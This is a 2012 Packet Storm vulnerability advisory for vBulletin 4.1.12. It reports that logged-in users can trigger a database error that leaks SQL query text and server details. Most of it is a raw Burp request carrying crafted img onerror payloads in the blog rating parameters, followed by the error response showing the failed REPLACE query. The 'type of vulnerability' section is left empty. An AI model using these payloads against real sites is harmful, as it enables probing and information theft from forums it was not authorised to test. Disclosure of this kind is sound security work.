vBulletin 4.1.12 SQL Information Disclosure

2012-06-08T00:00:00
ID PACKETSTORM:113421
Type packetstorm
Reporter HauntIT
Modified 2012-06-08T00:00:00

Description

                                        
                                            `   
  
  
  
[ TITLE ....... ][ vBulletin 4.1.12 - sql information leak (for logged-in users)  
[ DATE ........ ][ 03.05.2012  
[ AUTOHR ...... ][ http://hauntit.blogspot.com  
[ SOFT LINK ... ][ http://www.vbulletin.com  
[ VERSION ..... ][ 4.1.12  
[ TESTED ON ... ][ LAMP  
[ ----------------------------------------------------------------------- [  
  
[ 1. What is this?  
[ 2. What is the type of vulnerability?  
[ 3. Where is bug :)  
[ 4. More...  
  
[--------------------------------------------[  
[ 1. What is this?  
This is very nice CMS, You should try it! ;)  
  
[--------------------------------------------[  
[ 2. What is the type of vulnerability?  
  
  
[--------------------------------------------[  
[ 3. Where is bug :)  
  
--- raw from burp ---  
---raw-from-Burp---  
POST /www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml] HTTP/1.1  
  
Host: localhost  
  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-us,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Proxy-Connection: keep-alive  
  
X-Requested-With: XMLHttpRequest  
  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
  
Referer: http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html  
  
Cookie: skimlinks_enabled=1; vbulletin_userlist_hide_avatars_buddylist=0; editor_height=cms_article%23207px; bb_lastvisit=1335789702; bb_lastactivity=0; bb_sessionhash=bcf4631bc0ea002087ded92c796ac79a; bb_userstyleid=1; bb_skipmobilestyle=0; bb_thread_lastview=7aeffb9e62242afd6746ab9c8bcb589269ddf416a-1-%7Bi-121_i-1335789759_%7D; bb_forum_view=0ca42d3e5b599ba0a771e794d5098040cf6497cba-3-%7Bi-3_i-1335862432_i-2_i-1336034464_i-1_i-1336034445_%7D; bb_calendar=e2e67b4d0ec6ed855d66d62b21910a6cf6af50d6a-3-%7Bs-7-.calyear._i-2012_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; bb_blog_lastview=47cf4ac63a62d3c29c6a536323fa891bc5b8cd46a-1-%7Bi-2_i-1336037033_%7D  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
Content-Length: 630  
  
Connection: close  
  
  
  
ajax=1&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&do=rate&b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&  
  
---and-HTTP-answer---  
  
HTTP/1.1 200 OK  
  
Date: Thu, 03 May 2012 09:26:51 GMT  
  
Server: Apache/2.2.17 (Ubuntu)  
  
X-Powered-By: PHP/5.3.5-1ubuntu7.7  
  
Vary: Accept-Encoding  
  
Connection: close  
  
Content-Type: text/xml; charset=windows-1252  
  
X-Pad: avoid browser bug  
  
Content-Length: 1650  
  
  
  
<?xml version="1.0" encoding="windows-1252"?>  
<errors>  
<error><![CDATA[<p>Database Error</p>]]></error>  
<error_html><![CDATA[<p>Database error in vBulletin 4.1.12 Beta 1</p>  
<p>Invalid SQL:  
  
  
  
REPLACE INTO blog_visitor  
  
(userid, visitorid, dateline, day, visible)  
  
VALUES  
  
(  
  
,  
  
2,  
  
1336037212,  
  
1335909600,  
  
1  
  
);<p>  
<p>  
<strong>MySQL Error</strong> : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '  
  
2,  
  
1336037212,  
  
1335909600,  
  
1  
  
)' at line 5<br />  
<strong>Error Number</strong> : 1064<br />  
<strong>Request Date</strong> : Thursday, May 3rd 2012 @ 11:26:52 AM<br />  
<strong>Error Date</strong> : Thursday, May 3rd 2012 @ 11:26:56 AM<br />  
<strong>Script</strong> : http://localhost/www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]<br />  
<strong>Referrer</strong> : http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html<br />  
<strong>Classname</strong> : vB_Database<br />  
<strong>MySQL Version</strong> : <br />  
</p>]]></error_html>  
</errors>  
  
  
---raw-from-Burp---  
---  
  
Enjoy ;)  
[--------------------------------------------[  
[ 4. More...  
  
- http://hauntit.blogspot.com  
- http://www.google.com  
- http://portswigger.net  
[  
[--------------------------------------------[  
[ Questions? Mail me.  
]  
[ Cheers! o/  
[   
  
`